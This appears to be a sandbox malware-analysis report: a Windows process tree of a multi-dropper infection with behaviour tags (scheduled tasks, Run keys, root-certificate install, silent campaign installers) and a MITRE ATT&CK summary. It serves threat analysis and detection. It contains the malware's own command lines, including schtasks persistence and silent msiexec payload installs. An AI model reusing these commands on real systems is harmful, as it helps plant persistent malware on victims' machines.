C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"7⤵PID:2628
-
C:\Users\Admin\Documents\Zp6jrl6hsJPQzXD4ofXJ6NcO.exe"C:\Users\Admin\Documents\Zp6jrl6hsJPQzXD4ofXJ6NcO.exe"8⤵PID:4940
-
C:\Users\Admin\Pictures\Adobe Films\1UNlZrynJhGcHMClqAnAZqZA.exe"C:\Users\Admin\Pictures\Adobe Films\1UNlZrynJhGcHMClqAnAZqZA.exe"9⤵PID:4420
-
-
C:\Users\Admin\Pictures\Adobe Films\VzVcnZabiuvGdgaUlbzDNo3w.exe"C:\Users\Admin\Pictures\Adobe Films\VzVcnZabiuvGdgaUlbzDNo3w.exe"9⤵PID:7688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7688 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8888
-
-
-
C:\Users\Admin\Pictures\Adobe Films\dGnf4eToByXMuSt8IutgfRWU.exe"C:\Users\Admin\Pictures\Adobe Films\dGnf4eToByXMuSt8IutgfRWU.exe"9⤵PID:7680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 20410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:8604
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iqSOY62OzrYU1YEu4gcHuylu.exe"C:\Users\Admin\Pictures\Adobe Films\iqSOY62OzrYU1YEu4gcHuylu.exe"9⤵PID:7856
-
-
C:\Users\Admin\Pictures\Adobe Films\76sNFGK2BvYo5HLK0pdT0ET6.exe"C:\Users\Admin\Pictures\Adobe Films\76sNFGK2BvYo5HLK0pdT0ET6.exe"9⤵PID:7444
-
C:\Users\Admin\AppData\Local\Temp\is-KLBRT.tmp\76sNFGK2BvYo5HLK0pdT0ET6.tmp"C:\Users\Admin\AppData\Local\Temp\is-KLBRT.tmp\76sNFGK2BvYo5HLK0pdT0ET6.tmp" /SL5="$502C6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\76sNFGK2BvYo5HLK0pdT0ET6.exe"10⤵
- Loads dropped DLL
PID:5868 -
C:\Users\Admin\AppData\Local\Temp\is-T3U6B.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-T3U6B.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:8084 -
C:\Users\Admin\AppData\Local\Temp\MBJEZCRQUI\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\MBJEZCRQUI\foldershare.exe" /VERYSILENT12⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:7508
-
-
C:\Users\Admin\AppData\Local\Temp\b2-c8518-5ba-28089-31a29e654ba43\Laelulaekikae.exe"C:\Users\Admin\AppData\Local\Temp\b2-c8518-5ba-28089-31a29e654ba43\Laelulaekikae.exe"12⤵PID:8044
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵PID:9584
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471814⤵PID:9740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\59-abe67-5af-97290-fd2c3d228303d\Jafyferazhy.exe"C:\Users\Admin\AppData\Local\Temp\59-abe67-5af-97290-fd2c3d228303d\Jafyferazhy.exe"12⤵PID:6444
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2yhmeh5e.k43\GcleanerEU.exe /eufive & exit13⤵PID:17672
-
C:\Users\Admin\AppData\Local\Temp\2yhmeh5e.k43\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\2yhmeh5e.k43\GcleanerEU.exe /eufive14⤵PID:5156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5156 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:10964
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:19008
-
C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exeC:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6896 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\iwvgtgch.2md\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵
- Enumerates connected drives
PID:11476
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe & exit13⤵PID:3700
-
C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exeC:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe14⤵PID:1312
-
C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe"C:\Users\Admin\AppData\Local\Temp\ugfchvjl.1ql\any.exe" -u15⤵PID:4772
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ckywr5df.o53\gcleaner.exe /mixfive & exit13⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\ckywr5df.o53\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ckywr5df.o53\gcleaner.exe /mixfive14⤵PID:5584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 24415⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:11536
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e1oqww1i.szc\autosubplayer.exe /S & exit13⤵PID:5376
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\akhMUMUNUEvdQs_g_0zvWAt6.exe"C:\Users\Admin\Pictures\Adobe Films\akhMUMUNUEvdQs_g_0zvWAt6.exe"9⤵
- Loads dropped DLL
PID:2388 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Adds Run key to start application
PID:8600 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵PID:12272
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee012⤵PID:14004
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tEs2w0pahcSWzgkDgmhbiTwD.exe"C:\Users\Admin\Pictures\Adobe Films\tEs2w0pahcSWzgkDgmhbiTwD.exe"9⤵PID:7832
-
-
C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe"C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe"9⤵PID:7976
-
C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe"C:\Users\Admin\Pictures\Adobe Films\k93thIVrMWJ0ewTXFexvDtaK.exe" -u10⤵PID:8500
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:6528
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:4700
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone5⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0956c36b51.exeTue0956c36b51.exe /mixone6⤵
- Executes dropped EXE
PID:4428 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6504
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe5⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5132 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 17927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6960
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe5⤵PID:4264
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue093cbcf0222440.exeTue093cbcf0222440.exe6⤵
- Executes dropped EXE
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue093cbcf0222440.exe" -u7⤵
- Executes dropped EXE
PID:5532
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe5⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exeTue0990c8b597f.exe6⤵
- Executes dropped EXE
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\is-TKLBT.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-TKLBT.tmp\Tue0990c8b597f.tmp" /SL5="$10218,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5220 -
C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe" /SILENT8⤵
- Executes dropped EXE
PID:5560 -
C:\Users\Admin\AppData\Local\Temp\is-K99ID.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-K99ID.tmp\Tue0990c8b597f.tmp" /SL5="$20218,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4C9FD7C3\Tue0990c8b597f.exe" /SILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5756 -
C:\Users\Admin\AppData\Local\Temp\is-EB598.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EB598.tmp\postback.exe" ss110⤵PID:1692
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵PID:7012
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵PID:5340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:1436 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\1hR0WedLFCi2ffiQp2FL4Pi2.exe"3⤵PID:6840
-
-
-
C:\Users\Admin\AppData\Local\Temp\177C.exeC:\Users\Admin\AppData\Local\Temp\177C.exe2⤵
- Suspicious use of SetThreadContext
PID:3424 -
C:\Users\Admin\AppData\Local\Temp\177C.exeC:\Users\Admin\AppData\Local\Temp\177C.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5508
-
-
-
C:\Users\Admin\AppData\Local\Temp\8411.exeC:\Users\Admin\AppData\Local\Temp\8411.exe2⤵PID:1236
-
-
C:\Users\Admin\AppData\Local\Temp\8E73.exeC:\Users\Admin\AppData\Local\Temp\8E73.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8588 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5980
-
-
-
C:\Users\Admin\AppData\Local\Temp\A7E7.exeC:\Users\Admin\AppData\Local\Temp\A7E7.exe2⤵PID:4728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:19372
-
-
-
C:\Users\Admin\AppData\Local\Temp\C8DE.exeC:\Users\Admin\AppData\Local\Temp\C8DE.exe2⤵PID:6556
-
-
C:\Users\Admin\AppData\Local\Temp\1F1D.exeC:\Users\Admin\AppData\Local\Temp\1F1D.exe2⤵PID:9048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9048 -s 2443⤵
- Program crash
- Enumerates system info in registry
PID:6256
-
-
-
C:\Program Files (x86)\Ziv1tvr\2d8wlrxv4k0.exe"C:\Program Files (x86)\Ziv1tvr\2d8wlrxv4k0.exe"2⤵PID:4284
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 12a4c9cf975f8eb39ddebe440a4ece63 WngpQnQSq025SyXEi3KSag.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:3680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:1516
-
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵PID:13964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5352 -ip 53521⤵PID:5848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5132 -ip 51321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4428 -ip 44281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4556 -ip 45561⤵PID:5848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2220 -ip 22201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5480
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\19697758-d4d3-40ac-90bc-4f708ebf763b\test.bat"1⤵PID:5504
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\51ecad6f-8e20-45c6-87e3-c54a71f85ec3\test.bat"1⤵PID:6252
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 3088 -ip 30881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6448
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 4944 -ip 49441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5620 -ip 56201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2640 -ip 26401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3812 -ip 38121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7892
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
PID:7988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 828 -ip 8281⤵PID:7132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 1724 -ip 17241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8176
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2240 -ip 22401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6424 -ip 64241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:2612
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 380 -p 7076 -ip 70761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 7056 -ip 70561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8516
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 556 -p 5388 -ip 53881⤵PID:8588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2160 -ip 21601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc1⤵PID:4060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7688 -ip 76881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:8572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6252 -ip 62521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 7680 -ip 76801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
PID:8444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 7580 -ip 75801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4404
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 12a4c9cf975f8eb39ddebe440a4ece63 WngpQnQSq025SyXEi3KSag.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:652 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Executes dropped EXE
PID:7080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 8588 -ip 85881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4728 -ip 47281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:19172
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:7076
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 12a4c9cf975f8eb39ddebe440a4ece63 WngpQnQSq025SyXEi3KSag.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
PID:8468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 9048 -ip 90481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:5684
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6668 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4173D2B74D748C0609D9735152403C1B C2⤵PID:9780
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9F37024595B88610B30C3CCCDE91F2BE2⤵
- Blocklisted process makes network request
PID:12680 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:14084
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9A0EEBD3CC8C5187FF2780F8C906EED E Global\MSI00002⤵
- Drops file in Windows directory
PID:15444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2356 -ip 23561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 552 -ip 5521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10756
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 5156 -ip 51561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:10812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5584 -ip 55841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:11404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 8624 -ip 86241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:11712
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 9944 -ip 99441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12556
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
4Install Root Certificate
1Modify Registry
8Virtualization/Sandbox Evasion
1Web Service
1